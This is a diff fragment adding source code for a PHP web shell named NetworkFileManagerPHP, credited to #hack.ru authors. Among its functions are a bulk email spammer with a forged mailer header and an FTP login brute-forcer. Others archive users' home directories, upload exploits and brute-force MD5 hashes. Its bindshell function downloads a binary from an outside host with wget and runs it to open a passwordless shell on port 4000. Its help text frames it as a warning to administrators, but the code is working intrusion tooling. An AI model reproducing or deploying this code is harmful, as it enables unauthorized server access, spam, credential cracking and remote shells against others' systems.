+    echo"</textarea></td></tr></table>";
+	}
+	}
+	
+if (!isset($action)){
+ echo "
+ <TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#184984 BORDER=1 width=500 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white>
+ <form action='$PHP_SELF?action=spam1&status=ok' method=post enctype='multipart/form-data'>
+ <tr><td align=center class=pagetitle colspan=2><b>Main spammer settings</b></font></b></td></tr>
+<tr><td align=center class=pagetitle width=150>&nbsp;&nbsp;reply to:</td>
+<td align=left width=350>&nbsp;&nbsp;&nbsp;
+<input class='inputbox' type='text' name='from' size=50></td></tr>
+<tr><td align=center class=pagetitle width=150>&nbsp;&nbsp;send to:</td>
+<td align=left width=350>&nbsp;&nbsp;&nbsp;
+<input class='inputbox' type='text' name='otvet' size=50></td></tr>
+<tr><td align=center class=pagetitle width=150>&nbsp;&nbsp;Delay (sec):</td>
+<td align=left width=350>&nbsp;&nbsp;&nbsp;
+<input class='inputbox' type='text' name='wait' size=50></td></tr>
+<tr><td align=center class=pagetitle width=150>&nbsp;&nbsp;message topic:</td>
+<td align=left width=350>&nbsp;&nbsp;&nbsp;
+<input class='inputbox' type='text' name='subject' size=50></td></tr>
+<tr><td align=center class=pagetitle width=150>&nbsp;&nbsp;message body:</td>
+<td align=left width=350>&nbsp;&nbsp;&nbsp;
+<textarea name='body' rows='13' cols='60' class=inputbox> </textarea></td></tr>
+<tr><td align=center class=pagetitle width=150>&nbsp;&nbsp;File:</td>
+<td align=left width=350>&nbsp;&nbsp;&nbsp;
+<input class='inputbox' type='file' name='file' size=30></td></tr>
+<tr><td width=500 align=center colspan=2>
+<input type='submit' value='Generate' class=button1 $style_button >
+<INPUT TYPE='hidden' NAME='$chislo'>
+</td></tr>
+ </form></table>";
+}
+}
+}
+
+function spam1() {
+ global $status, $from, $otvet, $wait, $subject, $body, $file, $chislo;
+ set_time_limit(0);
+ignore_user_abort(1);
+
+ echo "<br><TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#184984 BORDER=1 width=500 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white>
+<tr><td align=center class=pagetitle><b>Send spam with current settings</b></font></b></td></tr>
+</table>";
+
+
+ error_reporting(63); if($from=="") { print
+"<script>history.back(-1);alert('missing field : <send from>')</script>";exit;}
+ error_reporting(63); if($otvet=="") { print
+"<script>history.back(-1);alert('missing field: <reply to>')</script>";exit;}
+ error_reporting(63); if($wait=="") { print
+"<script>history.back(-1);alert('missing field: <send delay>')</script>";exit;}
+ error_reporting(63); if($subject=="") { print
+"<script>history.back(-1);alert('missing field: <message topic>')</script>";exit;}
+ error_reporting(63); if($body=="") { print
+"<script>history.back(-1);alert('missing field: <message body>')</script>";exit;}
+
+  $address = "email.txt";
+  $counter = 0;
+ if (!isset($status)) echo "something goes wrong, check your settings";
+ else {
+ echo "
+ <TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#184984 BORDER=1 width=500 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white>
+ <tr><td align=center bgcolor=#FFFFCC>opening file <b>\"".$address."\"</b> ...<br></td></tr>
+";
+  if (@file_exists($address)) {
+ echo "
+  <tr><td align=center bgcolor=#FFFFCC>File <b>\"".$address."\"</b> was found...<br></td></tr>
+";
+    if($afile = @fopen ($address, "r")) {
+ echo "
+ <tr><td align=center bgcolor=#FFFFCC>File <b>\"".$address."\"</b> was opened for read...<br></td></tr>
+";
+    } else {
+ echo "
+ <tr><td align=center class=pagetitle>Unable to open  <b>\"".$address."\"</b> for read...<br></td></tr>
+";
+    }
+  } else {
+    echo "There is no file <b>\"".$address."\"</b> !<br>";
+    $status = "unable to find file \"".$address."\" ...";
+  }
+ echo "
+ <tr><td align=center bgcolor=#FFFFCC>Begining read from file <b>\"".$address."\"</b> ...<br></td></tr>
+ </table>";
+  if (@file_exists($address)) {
+
+    while (!feof($afile)) {
+
+      $line = fgets($afile, 1024);
+      $line = trim($line);
+      $recipient = "";
+      $recipient = $line;
+
+#if ($file) {
+#	$content = fread(fopen($file,"r"),filesize($file));
+#		$content = chunk_split(base64_encode($content));
+#		$name = basename($file);
+#   } else {
+#   $content ='';
+#   }
+      $boundary = uniqid("NextPart_");
+
+	  $header    = "From: ".$from."\r\n";
+	  $header   .= "Reply-To: ".$otvet."\r\n";
+	  $header   .= "Errors-To: ".$otvet."\r\n";
+      $header   .= "X-Mailer: MSOUTLOOK / ".phpversion()."\r\n";
+	  $header .= "Content-Transfer-Encoding: 8bits\n";
+      $header .= "Content-Type: text/html; charset=\"windows-1251\"\n\n";
+	  $header .= $body;
+	#  $header   .="--$boundary\nContent-type: text/html; charset=iso-8859-1\nContent-transfer-encoding: 8bit\n\n\n\n--$boundary\nContent-type: application/octet-stream; name=$file \nContent-disposition: inline; filename=$file \nContent-transfer-encoding: base64\n\n$content\n\n--$boundary--";
+
+
+	  $pattern="#^[-!\#$%&\"*+\\./\d=?A-Z^_|'a-z{|}~]+";
+      $pattern.="@";
+      $pattern.="[-!\#$%&\"*+\\/\d=?A-Z^_|'a-z{|}~]+\.";
+      $pattern.="[-!\#$%&\"*+\\./\d=?A-Z^_|'a-z{|}~]+$#";
+
+      if($recipient != "")
+      {
+        if(preg_match($pattern,$recipient))
+        {
+          echo "
+		  <TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#184984 BORDER=1 width=500 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white>
+ <tr><td align=center class=pagetitle>Sending mail to <b>\"".$recipient."\"</b>...sent ";
+
+
+            if(@mail($recipient, stripslashes($subject), stripslashes($header))) {
+              $counter = $counter + 1;
+              echo "<b>[\"".$counter."\"]</b> ".date("H:i:s")."</td></tr> </table>";
+            } else {
+              echo "<tr><td align=center class=pagetitle>email is wrong, message was NOT sent !</td></tr> </table>";
+            }
+          } else {
+              $counter = $counter + 1;
+              echo "";
+          }
+        } else {
+           echo "<br>";
+        }
+      $sec = $wait * 1000000;
+      usleep($sec);
+
+    }
+
+    if($otvet != "")
+    {
+
+      if(preg_match($pattern,$otvet))
+      {
+		echo " <TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#184984 BORDER=1 width=500 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white>
+		  <tr><td align=center class=pagetitle>Sending test message to <b>\"".$otvet."\"</b> to check out";
+        $subject = "".$subject;
+
+        if(@mail($otvet, stripslashes($subject), stripslashes($message), stripslashes($header))) {
+          $counter = $counter + 1;
+          echo " message was sent... <b>[\"".$counter."\"]</b> ".date("H:i:s")."</td></tr> </table>";
+        } else {
+          echo "<tr><td align=center class=pagetitle>message was not sent...</td></tr> </table>";
+        }
+      } else {
+          echo "<tr><td align=center class=pagetitle>email is wrong.</td></tr> </table>";
+      }
+    } else {
+    }
+
+    if(@fclose ($afile)) {
+      echo "
+	   <TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#184984 BORDER=1 width=500 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white>
+  <tr><td align=center class=pagetitle>File <b>\"".$address."\"</b> was closed successfully!<br></td></tr> </table>";
+    } else {
+      echo "
+	   <TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#184984 BORDER=1 width=500 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white>
+  <tr><td align=center class=pagetitle>Unable to close  <b>\"".$address."\"</b> file!<br></td></tr> </table>";    }
+  } else {
+    echo "unable to read file  <b>\"".$afile."\"</b> ...<br>";
+  }
+
+     $status2 ="Status: ".$counter." messages were sent.";
+    echo "<br>";
+    echo "
+	  <TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#184984 BORDER=1 width=500 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white>
+  <tr><td align=center class=pagetitle>$status2</td></tr> </table>";
+
+}
+}
+
+
+# help
+
+function help() {
+
+ global $action,$REMOTE_ADDR,$HTTP_REFERER;
+
+ echo "<br>
+
+<TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#184984 BORDER=1 width=500 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white>
+
+<tr><td align=center class=pagetitle><b>help for scriptNetworkFileManagerPHP</b></font></b></td></tr>
+
+<tr><td bgcolor=#FFFFCC><br><b>NetworkFileManagerPHP</b> - script to access your host in a best way</font><br><br>
+
+There were added some commands to NFM, from scripts kind of itself. They are:<br>
+
+- Using aliases (<b>Rush</b>)<br>
+
+- FTP bruteforce (<b>TerraByte<b/>)<br>
+
+- Translated to english by (<b>revers<b/>)<br>
+
+- Added some sysinfo commands by (<b>revers<b/>)<br>
+
+- All the rest code belongs to me (<b>xoce<b/>)<br>
+
+- Thanks for testing goes to all #hack.ru channel<br><br>
+
+<b>Warning, we wanted to show by this script, that admins have to protect their system better, then they do now. Jokes with apache config are not good... Pay more attention to configuration of your system.</b><br><br>
+
+<b>How can you find us:</b><br>
+
+Irc server: irc.megik.net:6667 /join #hack.ru<br>
+
+See you round at network!!!<br></td></tr></table><br>";
+
+}
+
+
+
+
+
+function exploits($dir) {
+
+ global $action,$status, $file3,$file2,$tm,$PHP_SELF,$HTTP_HOST,$style_button, $public_site, $private_site, $private, $public, $title_ex, $title_exp;
+
+if (!isset($status)) upload_exploits();
+
+
+
+else
+
+{
+
+
+
+$data = implode("", file($file3));
+
+$fp = @fopen($file2, "wb");
+
+fputs($fp, $data);
+
+$ok = fclose($fp);
+
+if($ok)
+
+{
+
+$size = filesize($file2)/1024;
+
+$sizef = sprintf("%.2f", $size);
+
+print "".exec("chmod 777 $public[1]")."";
+
+print "".exec("chmod 777 $public[2]")."";
+
+print "".exec("chmod 777 $public[3]")."";
+
+print "".exec("chmod 777 $private[1]")."";
+
+print "".exec("chmod 777 $private[2]")."";
+
+print "".exec("chmod 777 $private[3]")."";
+
+print "".exec("chmod 777 $private[4]")."";
+
+print "".exec("chmod 777 $private[5]")."";
+
+print "".exec("chmod 777 $private[6]")."";
+
+print "".exec("chmod 777 $private[7]")."";
+
+print "".exec("chmod 777 $private[8]")."";
+
+
+
+print "<br><TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#0066CC BORDER=1 width=300 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white><tr><td><center><font color='#FFFFCC' face='Tahoma' size = 2>You have uploaded: <b>file with size</b> (".$sizef."kb) </font></center></td></tr></table>";
+
+}
+
+else
+
+{
+
+print "Some errors occured.";
+
+}
+
+}
+
+}
+
+
+
+
+
+# FTP-bruteforce
+
+function ftp() {
+
+ global $action, $ftp_server, $filename, $HTTP_HOST;
+
+ ignore_user_abort(1);
+
+ echo "<br><TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#184984 BORDER=1 width=600 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white><tr><td align=center class=pagetitle>FTP server: <b>$ftp_server</b></td></tr>";
+
+
+
+ $fpip = @fopen ($filename, "r");
+
+ if ($fpip) {
+
+  while (!feof ($fpip)) {
+
+   $buf = fgets($fpip, 100);
+
+   ereg("^([0-9a-zA-Z]{1,})\:",$buf,$g);
+
+   $conn_id=ftp_connect($ftp_server);
+
+   if (($conn_id) && (@ftp_login($conn_id, $g[1], $g[1]))) {
+
+
+
+   $f=@fopen($HTTP_HOST,"a+");
+
+   fputs($f,"$g[1]:$g[1]\n");
+
+     echo "<TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#184984 BORDER=1 width=600 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white><tr><td align=center class=pagetitle><b>Connected with login:password - ".$g[1].":".$g[1]."</b></td></tr></table>";
+
+
+
+   ftp_close($conn_id);
+
+   fclose($f);
+
+   } else {
+
+    echo "<TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#FFFFCC BORDER=1 width=600 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white><tr><td align=center>".$g[1].":".$g[1]." - <b>failed</b></td></tr></table>";
+
+   }
+
+  }
+
+ }
+
+}
+
+
+
+function tar() {
+
+ global $action, $filename;
+
+ set_time_limit(0);
+
+ echo "<br>
+
+<TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#184984 BORDER=1 width=500 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white>
+
+<tr><td align=center class=pagetitle><b>Data compression</b></font></b></td></tr>
+
+<tr><td bgcolor=#FFFFCC><br><blockquote>According to the different settings of servers, I didn't make default config of NFM. You're to write full path to the domain's folder and then press enter, so all data, containing in this folder will be compressed to tar.gz.<br><br>
+
+<b>Warning!</b><br>File <b>passwd</b> can have big size, so opening all users of this host can waste much time.<br><br>
+
+<b>It's highly recommended!</b><br>Open current function in another window of browser, to compress information, which you're interested in, during your host exploring.</blockquote></td></tr>
+
+</table><br>";
+
+
+
+$http_public="/public_html/";
+
+$fpip = @fopen ($filename, "r");
+
+if ($fpip) {
+
+ while (!feof ($fpip)) {
+
+  $buf = fgets($fpip, 100);
+
+  ereg("^([0-9a-zA-Z]{1,})\:",$buf,$g);
+
+  $name=$g[1];
+
+  echo "
+
+<TABLE CELLPADDING=0 CELLSPACING=0 width='600' bgcolor=#184984 BORDER=1 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white>
+
+<form method='get' action='$PHP_SELF' >
+
+<tr><td align=center colspan=2 class=pagetitle><b>Compression <u>$name.tar.gz</u>:</b></td></tr>
+
+<tr>
+
+<td valign=top><input type=text name=cm size=90 class='inputbox'value='tar -zc /home/$name$http_public -f $name.tar.gz' ></td>
+
+<td valign=top><input type=submit value='GO' class=button1 $style_button></td>
+
+</tr></form></table>";
+
+  }
+
+ }
+
+}
+
+
+
+# bindshell
+
+function bash() {
+
+ global $action, $port_bind, $pass_key;
+
+
+
+echo "<br>
+
+<TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#184984 BORDER=1 width=500 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white>
+
+<tr><td align=center class=pagetitle><b>Binding shell</b></font></b></td></tr>
+
+<tr><td bgcolor=#FFFFCC><br>Current shell binds 4000 port, you may access to it by telneting to host:4000 port without password.</td></tr>
+
+</table><br>";
+
+
+
+echo "
+
+<TABLE CELLPADDING=0 CELLSPACING=0 width='500' bgcolor=#184984 BORDER=1 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white>
+
+<tr><td align=center class=pagetitle><b> Bindshell binary is situated in file called<u><i>s</i></u></b></td></tr>";
+
+
+
+echo "<tr><td align=center bgcolor=#FFFFCC><b>&nbsp; ".exec("wget http://hackru.info/adm/exploits/bash/s")."</b> Downloading...</td></tr>";
+
+echo "<tr><td align=center bgcolor=#FFFFCC><b>&nbsp; ".exec("chmod 777 s")."</b> now chmod to 777</td></tr>";
+
+echo "<tr><td align=center bgcolor=#FFFFCC><b>&nbsp; ".exec("./s")."</b> now running to 4000 port</td></tr>";
+
+# echo "<tr><td align=center bgcolor=#FFFFCC><b>&nbsp; ".exec("rm -f s")."</b> Removing file<u>s</u> now...</td></tr>";
+
+echo"</table>";
+
+
+
+ }
+
+
+
+function crypte() {
+
+ global $action,$md5a,$sha1a,$crc32, $key,$string;
+
+echo "<br>
+
+<TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#184984 BORDER=1 width=500 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white>
+
+<tr><td align=center class=pagetitle><b>Data crypter</b></font></b></td></tr>
+
+<tr><td bgcolor=#FFFFCC><br><blockquote>Now there are many different programs and scripts, which uses a lot of passwords crypt methods (Do you remember what a phpBB is?=)), so with NFM you can crypt some strings to hashes, because sometimes you may need to change somebodyes data with your one =). Also you may change your pass to NFM here.</blockquote></td></tr>
+
+</table>";
+
+
+
+echo "
+
+ <TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#184984 BORDER=1 width=500 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white>
+
+ <form enctype='multipart/form-data' action='$PHP_SELF?action=crypte' method=post>
+
+ <tr><td align=left valign=top colspan=3 class=pagetitle>
+
+ &nbsp;&nbsp;<b>Here are some useful cryption methods, which uses MHASH lib:</b></td></tr>
+
+ <tr><td align=left valign=top colspan=3 bgcolor=#FFFFCC>
+
+ &nbsp;&nbsp;<b>MD5 </b>(Very popular and fast method)</td></tr>
+
+ <tr>
+
+ <td class=pagetitle width=400>&nbsp;Result:&nbsp;&nbsp;<font color=#ffffcc><b>".md5($md5a)."</b></font></td>
+
+ <td class=pagetitle width=100>&nbsp;Input:&nbsp;<font color=red><b>".$md5a."</b></font></td></tr>
+
+ <tr><td align=center width=400><input class='inputbox'type='text' name='md5a' size='50' value='' id='md5a'></td>
+
+ <td align=center width=100><input type='submit' value='Crypt MD5' class=button1 $style_button></td></tr>
+
+
+
+ </form></table>";
+
+ echo "
+
+ <TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#184984 BORDER=1 width=500 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white>
+
+ <form enctype='multipart/form-data' action='$PHP_SELF?action=crypte' method=post>
+
+ <tr> <tr><td align=left valign=top colspan=3 bgcolor=#FFFFCC>
+
+ &nbsp;&nbsp;<b>SHA1 </b>(SHA1 - method to crypt with open key, It's very usefull too)</td></tr>
+
+ <tr>
+
+ <td class=pagetitle width=400>&nbsp;Result:&nbsp;&nbsp;<font color=#ffffcc><b>".sha1($sha1a)."</b></font></td>
+
+ <td class=pagetitle width=100>&nbsp;Input:&nbsp;<font color=red><b>".$sha1a."</b></font></td></tr>
+
+ <tr><td align=center width=400><input class='inputbox' type='text' name='sha1a' size='50' value='' id='sha1a'>
+
+ </td><td align=center width=100><input type='submit' value='Crypt SHA1' class=button1 $style_button></td></tr>
+
+
+
+ </form></table>";
+
+echo "
+
+ <TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#184984 BORDER=1 width=500 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white>
+
+ <form enctype='multipart/form-data' action='$PHP_SELF?action=crypte' method=post>
+
+ <tr> <tr><td align=left valign=top colspan=3 bgcolor=#FFFFCC width=500>
+
+ &nbsp;&nbsp;<b>CRC32 </b>(Most used when making CRC check of data, but you can find a host with forum, with passwords, crypted by CRC32)</td></tr>
+
+ <tr>
+
+ <td class=pagetitle width=400>&nbsp;Result:&nbsp;&nbsp;<font color=#ffffcc><b>".crc32($crc32)."</b></font></td>
+
+ <td class=pagetitle width=100>&nbsp;Input:&nbsp;<font color=red><b>".$crc32."</b></font></td></tr>
+
+ <tr><td align=center width=400><input class='inputbox' type='text' name='crc32' size='50' value='' id='crc32'></td><td width=100 align=center><input type='submit' value='Crypt CRC32' class=button1 $style_button></td></tr>
+
+
+
+ </form></table>";
+
+
+
+ }
+
+
+
+function decrypte() {
+
+ global $action,$pass_de,$chars_de,$dat,$date;
+
+set_time_limit(0);
+
+ignore_user_abort(1);
+
+
+
+echo "<br>
+
+<TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#184984 BORDER=1 width=500 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white>
+
+<tr><td align=center class=pagetitle><b>Data decrypter</b></font></b></td></tr>
+
+<tr><td bgcolor=#FFFFCC><br><blockquote>It's known all over the world, that MD5 crypt algorithm has no way to decrypt it, because it uses hashes. The one and only one way to try read what the hash is - to generate some hashes and then to compare them with source hash needed to be decrypted ... So this is bruteforce.</blockquote></td></tr>
+
+</table>";
+
+
+
+if($chars_de==""){$chars_de="";}
+
+ echo "
+
+ <TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#184984 BORDER=1 width=500 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white>
+
+ <form action='$PHP_SELF?action=decrypte' method=post name=hackru><tr><td align=left valign=top colspan=3 class=pagetitle>
+
+ &nbsp;&nbsp;<b>Data decrypter:</b></td></tr>
+
+ <tr> <tr><td align=left valign=top colspan=3 bgcolor=#FFFFCC width=500>
+
+ &nbsp;&nbsp;<b>Decrypt MD5</b>(decryption time depends on the length or crypted word, may take a long time)</td></tr>
+
+ <tr>
+
+ <td class=pagetitle width=400 >&nbsp;MD5 hash:&nbsp;&nbsp;<font color=#ffffcc><b>".$pass_de."</b></font></td><td width=100 align=center>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<input type=reset value=Clear class=button1 $style_button></td>
+
+  <tr><td align=left width=400 >&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<textarea  class='inputbox' name='chars_de' cols='50' rows='5'>".$chars_de."</textarea></td>
+
+  <td class=pagetitle width=120 valign=top><b>Symvols for bruteforce:</b><br><font color=red><b><u>ENG:</u></b></font>
+
+   <a class=menu href=javascript:ins('abcdefghijklmnopqrstuvwxyz')>[a-z]</a>
+
+<a class=menu href=javascript:ins('ABCDEFGHIJKLMNOPQRSTUVWXYZ')>[A-Z]</a>
+
+<a class=menu href=javascript:ins('0123456789')>[0-9]</a>
+
+<a class=menu href=javascript:ins('~`\!@#$%^&*()-_+=|/?&gt;<[]{}:¹.,&quot;')>[Symvols]</a><br><br>
+
+<font color=red><b><u>RUS:</u></b></font>
+
+<a class=menu href=javascript:ins('àáâãäå¸æçèéêëìíîïðñòóôõö÷øùúûüýþÿ')>[à-ÿ]</a>
+
+<a class=menu href=javascript:ins('ÀÁÂÃÄŨÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞß')>[À-ß]</a>
+
+</td></tr>
+
+<tr><td align=center width=400>
+
+<input class='inputbox' type='text' name='pass_de' size=50 onclick=this.value=''></td><td width=100 align=center><input type='submit' value='Decrypt MD5' class=button1 $style_button>
+
+</td></tr>
+
+
+
+ </form></table>";
+
+
+
+
+
+if($_POST[pass_de]){
+
+$pass_de=htmlspecialchars($pass_de);
+
+$pass_de=stripslashes($pass_de);
+
+$dat=date("H:i:s");
+
+$date=date("d:m:Y");
+
+
+
+crack_md5();
+
+}
+
+}
+
+
+
+function crack_md5() {
+
+global $chars_de;
+
+$chars=$_POST[chars];
+
+set_time_limit(0);
+
+ignore_user_abort(1);
+
+$chars_de=str_replace("<",chr(60),$chars_de);
+
+$chars_de=str_replace(">",chr(62),$chars_de);
+
+$c=strlen($chars_de);
+
+for ($next = 0; $next <= 31; $next++) {
+
+for ($i1 = 0; $i1 <= $c; $i1++) {
+
+$word[1] = $chars_de{$i1};
+
+for ($i2 = 0; $i2 <= $c; $i2++) {
+
+$word[2] = $chars_de{$i2};
+
+if ($next <= 2) {
+
+result(implode($word));
+
+}else {
+
+for ($i3 = 0; $i3 <= $c; $i3++) {
+
+$word[3] = $chars_de{$i3};
+
+if ($next <= 3) {
+
+result(implode($word));
+
+}else {
+
+for ($i4 = 0; $i4 <= $c; $i4++) {
+
+$word[4] = $chars_de{$i4};
+
+if ($next <= 4) {
+
+result(implode($word));
+
+}else {
+
+for ($i5 = 0; $i5 <= $c; $i5++) {
+
+$word[5] = $chars_de{$i5};
+
+if ($next <= 5) {
+
+result(implode($word));
+
+}else {
+
+for ($i6 = 0; $i6 <= $c; $i6++) {
+
+$word[6] = $chars_de{$i6};
+
+if ($next <= 6) {
+
+result(implode($word));
+
+}else {
+
+for ($i7 = 0; $i7 <= $c; $i7++) {
+
+$word[7] = $chars_de{$i7};
+
+if ($next <= 7) {
+
+result(implode($word));
+
+}else {
+
+for ($i8 = 0; $i8 <= $c; $i8++) {
+
+$word[8] = $chars_de{$i8};
+
+if ($next <= 8) {
+
+result(implode($word));
+
+}else {
+
+for ($i9 = 0; $i9 <= $c; $i9++) {
+
+$word[9] = $chars_de{$i9};
+
+if ($next <= 9) {
+
+result(implode($word));
+
+}else {
+
+for ($i10 = 0; $i10 <= $c; $i10++) {
+
+$word[10] = $chars_de{$i10};
+
+if ($next <= 10) {
+
+result(implode($word));
+
+}else {
+
+for ($i11 = 0; $i11 <= $c; $i11++) {
+
+$word[11] = $chars_de{$i11};
+
+if ($next <= 11) {
+
+result(implode($word));
+
+}else {
+
+for ($i12 = 0; $i12 <= $c; $i12++) {
+
+$word[12] = $chars_de{$i12};
+
+if ($next <= 12) {
+
+result(implode($word));
+
+}else {
+
+for ($i13 = 0; $i13 <= $c; $i13++) {
+
+$word[13] = $chars_de{$i13};
+
+if ($next <= 13) {
+
+result(implode($word));
+
+}else {
+
+for ($i14 = 0; $i14 <= $c; $i14++) {
+
+$word[14] = $chars_de{$i14};
+
+if ($next <= 14) {
+
+result(implode($word));
+
+}else {
+
+for ($i15 = 0; $i15 <= $c; $i15++) {
+
+$word[15] = $chars_de{$i15};
+
+if ($next <= 15) {
+
+result(implode($word));
+
+}else {
+
+for ($i16 = 0; $i16 <= $c; $i16++) {
+
+$word[16] = $chars_de{$i16};
+
+if ($next <= 16) {
+
+result(implode($word));
+
+}else {
+
+for ($i17 = 0; $i17 <= $c; $i17++) {
+
+$word[17] = $chars_de{$i17};
+
+if ($next <= 17) {
+
+result(implode($word));
+
+}else {
+
+for ($i18 = 0; $i18 <= $c; $i18++) {
+
+$word[18] = $chars_de{$i18};
+
+if ($next <= 18) {
+
+result(implode($word));
+
+}else {
+
+for ($i19 = 0; $i19 <= $c; $i19++) {
+
+$word[19] = $chars_de{$i19};
+
+if ($next <= 19) {
+
+result(implode($word));
+
+}else {
+
+for ($i20 = 0; $i20 <= $c; $i20++) {
+
+$word[20] = $chars_de{$i20};
+
+if ($next <= 20) {
+
+result(implode($word));
+
+}else {
+
+for ($i21 = 0; $i21 <= $c; $i21++) {
+
+$word[21] = $chars_de{$i21};
+
+if ($next <= 21) {
+
+result(implode($word));
+
+}else {
+
+for ($i22 = 0; $i22 <= $c; $i22++) {
+
+$word[22] = $chars_de{$i22};
+
+if ($next <= 22) {
+
+result(implode($word));
+
+}else {
+
+for ($i23 = 0; $i23 <= $c; $i23++) {
+
+$word[23] = $chars_de{$i23};
+
+if ($next <= 23) {
+
+result(implode($word));
+
+}else {
+
+for ($i24 = 0; $i24 <= $c; $i24++) {
+
+$word[24] = $chars_de{$i24};
+
+if ($next <= 24) {
+
+result(implode($word));
+
+}else {
+
+for ($i25 = 0; $i25 <= $c; $i25++) {
+
+$word[25] = $chars_de{$i25};
+
+if ($next <= 25) {
+
+result(implode($word));
+
+}else {
+
+for ($i26 = 0; $i26 <= $c; $i26++) {
+
+$word[26] = $chars_de{$i26};
+
+if ($next <= 26) {
+
+result(implode($word));
+
+}else {
+
+for ($i27 = 0; $i27 <= $c; $i27++) {
+
+$word[27] = $chars_de{$i27};
+
+if ($next <= 27) {
+
+result(implode($word));
+
+}else {
+
+for ($i28 = 0; $i28 <= $c; $i28++) {
+
+$word[28] = $chars_de{$i28};
+
+if ($next <= 28) {
+
+result(implode($word));
+
+}else {
+
+for ($i29 = 0; $i29 <= $c; $i29++) {
+
+$word[29] = $chars_de{$i29};
+
+if ($next <= 29) {
+
+result(implode($word));
+
+}else {
+
+for ($i30 = 0; $i30 <= $c; $i30++) {
+
+$word[30] = $chars_de{$i30};
+
+if ($next <= 30) {
+
+result(implode($word));
+
+}else {
+
+for ($i31 = 0; $i31 <= $c; $i31++) {
+
+$word[31] = $chars_de{$i31};
+
+if ($next <= 31) {
+
+result(implode($word));
+
+
+
+}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}
+
+
+
+function result($word) {
+
+global $dat,$date;
+
+$pass_de=$_POST[pass_de];
+
+$dat2=date("H:i:s");
+
+$date2=date("d:m:Y");
+
+
+
+if(md5($word)==$pass_de){
+
+print "
+
+<TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#184984 BORDER=1 width=500 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white>
+
+  <tr><td align=left valign=top colspan=2 bgcolor=#FFFFCC>&nbsp;&nbsp; Brutefrcing result:</td></tr>
+
+  <tr><td class=pagetitle width=400>&nbsp;&nbsp;<b>crypted Hash:</b></td><td class=pagetitle width=100><font color=red>&nbsp;&nbsp;<b>$word</b></font></td></tr>
+
+  <tr><td class=pagetitle width=200>&nbsp;&nbsp;<b>Bruteforce start:</b></td><td class=pagetitle width=200><font color=#ffffcc>&nbsp;&nbsp;<b>$dat - $date</b></font></td></tr>
+
+  <tr><td class=pagetitle width=200>&nbsp;&nbsp;<b>Bruteforce finish:</b></td><td class=pagetitle width=200><font color=#ffffcc>&nbsp;&nbsp;<b>$dat2 - $date2</b></font></td></tr>
+
+  <tr><td align=left valign=top colspan=2 bgcolor=#FFFFCC>&nbsp;&nbsp;result was wrote to file:  <b>".$word."_md5</b></td></tr>
+
+</table>
+
+                            ";
+
+							$f=@fopen($word._md5,"a+");
+
+                            fputs($f,"Decrypted MD5 hash [$pass_de] = $word\nBruteforce start:\t$dat - $date\Bruteforce finish:\t$dat2 - $date2\n ");
+
+                             exit;}
+
+
+
+
+
+
+
+}
+
+
+
+function brut_ftp() {
+
+ global $action,$private_site, $title_exp,$login, $host, $file, $chislo, $proverka;
+
+set_time_limit(0);
+
+ignore_user_abort(1);
+
+echo "<br>
+
+<TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#184984 BORDER=1 width=500 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white>
+
+<tr><td align=center class=pagetitle><b>FTP bruteforce</b></font></b></td></tr>
+<tr><td bgcolor=#FFFFCC><br><blockquote>This is new ftp-bruteforcer it can make his own brute passwords list on the fly he needs nothing to do it, so It's not a problem for you to bryte any ftp account now. But do not write very big value of passwords (10000 will be quite enough) because it mat couse a very heavy server overload . </blockquote></td></tr>
+
+</table>";
+
+
+
+ echo "
+
+ <TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#184984 BORDER=1 width=500 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white>
+
+ <form action='$PHP_SELF?action=brut_ftp' method=post><tr><td align=left valign=top colspan=3 class=pagetitle>
+
